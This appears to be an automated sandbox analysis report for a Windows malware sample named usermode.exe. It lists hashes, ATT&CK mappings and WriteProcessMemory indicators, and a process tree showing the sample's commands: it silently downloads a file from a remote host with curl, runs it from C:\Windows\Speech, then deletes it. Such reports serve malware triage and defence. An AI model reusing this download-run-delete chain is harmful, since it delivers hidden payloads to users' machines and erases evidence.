92c13c55b6e2afc22881d1bd9cbea837d7f2dbc3e1c17c194608f2f86d0cc597

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
05-12-2024 18:30

Target

usermode.exe
Size

671KB
MD5

0f1700ee21d3f50876ba87ba59b5362c
SHA1

0204c433d0529811f23b71582da12e4276b3439f
SHA256

92c13c55b6e2afc22881d1bd9cbea837d7f2dbc3e1c17c194608f2f86d0cc597
SHA512

6ac8306aebf8161019df51b26078f3c993aeda3ecb9d4510e67fe788555d91a8453943136568bc643643b9fdea2983771fe35eecff47cafcc577aec789ef1f89
SSDEEP

12288:RZco5avwoS8/jtVoMpaSU5WflFr5//EmnBPG2pptCA:WFS8/eS4WflFr5//EmnVrbt

Score

6^/10

defense_evasion

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2312 wrote to memory of 2496	2312	usermode.exe	31
PID 2312 wrote to memory of 2496	2312	usermode.exe	31
PID 2312 wrote to memory of 2496	2312	usermode.exe	31
PID 2312 wrote to memory of 1272	2312	usermode.exe	32
PID 2312 wrote to memory of 1272	2312	usermode.exe	32
PID 2312 wrote to memory of 1272	2312	usermode.exe	32
PID 2312 wrote to memory of 1300	2312	usermode.exe	33
PID 2312 wrote to memory of 1300	2312	usermode.exe	33
PID 2312 wrote to memory of 1300	2312	usermode.exe	33
PID 2312 wrote to memory of 1216	2312	usermode.exe	34
PID 2312 wrote to memory of 1216	2312	usermode.exe	34
PID 2312 wrote to memory of 1216	2312	usermode.exe	34
PID 2312 wrote to memory of 112	2312	usermode.exe	35
PID 2312 wrote to memory of 112	2312	usermode.exe	35
PID 2312 wrote to memory of 112	2312	usermode.exe	35
PID 2312 wrote to memory of 2636	2312	usermode.exe	36
PID 2312 wrote to memory of 2636	2312	usermode.exe	36
PID 2312 wrote to memory of 2636	2312	usermode.exe	36

C:\Users\Admin\AppData\Local\Temp\usermode.exe
"C:\Users\Admin\AppData\Local\Temp\usermode.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
  2⤵
  PID:2496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe
  2⤵
  PID:112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe
  2⤵
  PID:2636

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

File Deletion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact